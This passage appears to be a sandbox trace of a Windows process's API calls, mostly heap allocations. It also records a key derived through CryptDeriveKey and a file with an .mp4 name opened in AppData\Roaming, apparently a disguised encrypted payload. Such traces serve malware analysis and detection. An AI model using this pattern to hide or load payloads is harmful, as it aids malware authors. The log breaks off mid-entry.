[0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e513b8 [0223.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e513b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.544] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0223.544] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87390, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0223.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0223.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0223.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0223.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0223.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.550] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0223.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.550] CryptDestroyHash (hHash=0xa87390) returned 1 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0223.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0223.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0223.754] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ATHv.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\athv.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0223.755] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.755] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0223.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0223.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.755] HeapFree (in: 